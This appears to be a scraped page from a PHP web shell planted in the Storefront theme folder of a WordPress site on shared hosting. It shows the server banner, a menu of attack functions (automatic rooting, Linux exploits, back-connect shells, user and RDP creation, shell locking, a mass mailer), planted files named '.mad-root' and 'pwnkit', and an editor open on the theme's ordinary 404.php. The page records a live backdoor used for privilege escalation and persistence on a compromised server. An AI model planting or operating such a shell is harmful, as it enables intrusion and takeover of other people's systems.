Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.216.197
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
themes /
storefront /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
2.06
KB
-rw-r--r--
README.txt
53.73
KB
-rw-r--r--
archive.php
756
B
-rw-r--r--
comments.php
3.04
KB
-rw-r--r--
content-homepage.php
659
B
-rw-r--r--
content-none.php
1.2
KB
-rw-r--r--
content-page.php
406
B
-rw-r--r--
content-single.php
679
B
-rw-r--r--
content.php
445
B
-rw-r--r--
footer.php
737
B
-rw-r--r--
functions.php
2.16
KB
-rw-r--r--
header.php
1.9
KB
-rw-r--r--
index.php
788
B
-rw-r--r--
loop.php
737
B
-rw-r--r--
page.php
860
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
59.31
KB
-rw-r--r--
search.php
731
B
-rw-r--r--
sidebar.php
278
B
-rw-r--r--
single.php
538
B
-rw-r--r--
style-rtl.css
39.52
KB
-rw-r--r--
style.css
39.54
KB
-rw-r--r--
style.scss
2.66
KB
-rw-r--r--
template-fullwidth.php
657
B
-rw-r--r--
template-homepage.php
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (not found). * * @package storefront */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <div class="error-404 not-found"> <div class="page-content"> <header class="page-header"> <h1 class="page-title"><?php esc_html_e( 'Oops! That page can’t be found.', 'storefront' ); ?></h1> </header><!-- .page-header --> <p><?php esc_html_e( 'Nothing was found at this location. Try searching, or check out the links below.', 'storefront' ); ?></p> <?php echo '<section aria-label="' . esc_html__( 'Search', 'storefront' ) . '">'; if ( storefront_is_woocommerce_activated() ) { the_widget( 'WC_Widget_Product_Search' ); } else { get_search_form(); } echo '</section>'; if ( storefront_is_woocommerce_activated() ) { echo '<div class="fourohfour-columns-2">'; echo '<section class="col-1" aria-label="' . esc_html__( 'Promoted Products', 'storefront' ) . '">'; storefront_promoted_products(); echo '</section>'; echo '<nav class="col-2" aria-label="' . esc_html__( 'Product Categories', 'storefront' ) . '">'; echo '<h2>' . esc_html__( 'Product Categories', 'storefront' ) . '</h2>'; the_widget( 'WC_Widget_Product_Categories', array( 'count' => 1, ) ); echo '</nav>'; echo '</div>'; echo '<section aria-label="' . esc_html__( 'Popular Products', 'storefront' ) . '">'; echo '<h2>' . esc_html__( 'Popular Products', 'storefront' ) . '</h2>'; $shortcode_content = storefront_do_shortcode( 'best_selling_products', array( 'per_page' => 4, 'columns' => 4, ) ); echo $shortcode_content; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped echo '</section>'; } ?> </div><!-- .page-content --> </div><!-- .error-404 --> </main><!-- #main --> </div><!-- #primary --> <?php get_footer();
Close